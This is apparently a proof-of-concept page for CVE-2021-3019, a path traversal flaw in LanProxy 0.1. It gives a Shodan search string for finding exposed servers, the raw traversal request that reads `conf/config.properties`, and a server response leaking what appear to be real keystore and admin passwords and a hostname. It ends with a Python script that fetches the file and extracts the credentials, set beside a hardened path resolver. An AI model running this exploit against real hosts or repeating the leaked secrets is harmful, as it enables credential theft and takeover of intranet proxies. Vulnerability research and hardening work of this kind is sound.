
CVE-2021-3019 PoC — Ffay Lanproxy Path Traversal Vulnerability

Source
Associated Vulnerability
Title: Ffay Lanproxy Path Traversal Vulnerability (CVE-2021-3019)
Description: Ffay Lanproxy is an intranet penetration (NAT traversal) tool by the individual developer Ffay that proxies services on a LAN to the public network. ffay lanproxy 0.1 has a path traversal vulnerability: a directory traversal request for /../conf/config.properties reads the configuration file and obtains the credentials for intranet connections.
Description
[CVE-2021-3019] LanProxy Directory Traversal
Readme
<b>[CVE-2021-3019] LanProxy Directory Traversal</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports TCP traffic forwarding and therefore any protocol layered on TCP (access to intranet websites, local payment-interface debugging, SSH access,
remote desktop, etc.). LanProxy version 0.1 has a path traversal vulnerability in its web management interface: a request for `/../conf/config.properties` returns the server's configuration file, which contains the credentials for intranet connections as well as the admin panel username and password and the SSL keystore passwords.

Shodan search: `"Server: LPS-0.1"`<br>
<br>Reading the configuration file (the request is sent to the admin panel port set by `config.server.port`, 8090 in the response below):

```
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```

```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#Port for communicating with the proxy client
#This is the port the client connects to
server.port=4900

#SSL-related configuration
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#This setting can be ignored
server.ssl.needsClientAuth=false

#Web online configuration management settings
#Server IP address; the default usually does not need changing
config.server.bind=0.0.0.0

#Admin control panel port (allow this port in the security group)
config.server.port=8090

#Admin control panel username and password
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
```
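As an added example, not part of the PoC repository or of LanProxy itself, the following Python script shows the two halves a practitioner cares about: the traversal as a path-resolution defect (a request path appended to the web root without a containment check) beside a hardened resolver, and a parser that pulls the credentials out of a leaked `config.properties`. The sample configuration, the host name and the web root directory `/srv/lanproxy/webroot` are constructed placeholders; `fetch_config()` sends the same request as the PoC above and is only meant for a host you are authorised to test.

```python
"""Added example (not from the PoC repository): parse a leaked LanProxy
config.properties and show the traversal bug next to a hardened path check."""
import http.client
import os

# Constructed sample in the same layout as the leaked file on this page.
# The values are placeholders, not real credentials.
SAMPLE_CONFIG = """\
server.bind=0.0.0.0
#Port for communicating with the proxy client
server.port=4900
server.ssl.enable=true
server.ssl.keyStorePassword=EXAMPLE_KEYSTORE_PW
server.ssl.keyManagerPassword=EXAMPLE_KEYSTORE_PW
config.server.port=8090
config.admin.username=admin
config.admin.password=EXAMPLE_ADMIN_PW
"""

SENSITIVE_KEYWORDS = ("password", "username", "secret", "token")


def parse_properties(body: str) -> dict:
    """Minimal Java .properties parser: '#'/'!' comments, key=value or key:value."""
    props = {}
    for raw in body.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        # Split on whichever of '=' or ':' comes first, as java.util.Properties does.
        cut = len(line)
        for sep in "=:":
            idx = line.find(sep)
            if idx != -1 and idx < cut:
                cut = idx
        props[line[:cut].strip()] = line[cut + 1:].strip()
    return props


def extract_credentials(props: dict) -> dict:
    """Keep only the keys an attacker would take from the leaked file."""
    return {k: v for k, v in props.items()
            if any(word in k.lower() for word in SENSITIVE_KEYWORDS)}


def is_lanproxy(headers: dict) -> bool:
    """Fingerprint from the Server header seen on this page ('LPS-0.1')."""
    server = {k.lower(): v for k, v in headers.items()}.get("server", "")
    return server.startswith("LPS-")


def vulnerable_resolve(webroot: str, request_path: str) -> str:
    """The bug pattern: the request path is joined to the web root without
    checking that the result stays inside it, so '/../conf/x' walks out."""
    return os.path.normpath(os.path.join(webroot, request_path.lstrip("/")))


def safe_resolve(webroot: str, request_path: str):
    """Hardened: resolve '..' and symlinks, then refuse anything outside the
    real web root. Returns None for a traversal attempt (answer 403/404)."""
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, request_path.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def build_request(host: str, port: int = 8090) -> bytes:
    """Raw request line used by the PoC, for a socket-level check."""
    return (f"GET /../conf/config.properties HTTP/1.1\r\nHost: {host}:{port}\r\n"
            f"Connection: close\r\n\r\n").encode()


def fetch_config(host: str, port: int = 8090, timeout: float = 5.0):
    """Live check against an authorised target. http.client sends the path
    verbatim, so the '..' reaches the server unnormalised. Returns
    (is_lanproxy, credentials) or None when the file is not served."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", "/../conf/config.properties",
                 headers={"Connection": "close"})
    resp = conn.getresponse()
    headers = dict(resp.getheaders())
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    if resp.status != 200:
        return None
    return is_lanproxy(headers), extract_credentials(parse_properties(body))


if __name__ == "__main__":
    print(extract_credentials(parse_properties(SAMPLE_CONFIG)))
    print(vulnerable_resolve("/srv/lanproxy/webroot", "/../conf/config.properties"))
    print(safe_resolve("/srv/lanproxy/webroot", "/../conf/config.properties"))
```

The hardened resolver compares real paths rather than string prefixes, so a symlink inside the web root that points outside it is rejected as well; a prefix check on the unresolved string would accept `/srv/lanproxy/webroot-old/...` as inside `/srv/lanproxy/webroot`.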

![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2000.57.50.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.13.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.23.png)

File Snapshot

```
[4.0K] /data/pocs/ba71a07aaf23e75deff40bac3e32269d88cf57e4
├── [2.1K] README.md
├── [263K] Screen Shot 2021-03-03 at 00.57.50.png
├── [233K] Screen Shot 2021-03-03 at 01.01.13.png
└── [232K] Screen Shot 2021-03-03 at 01.01.23.png

0 directories, 4 files
```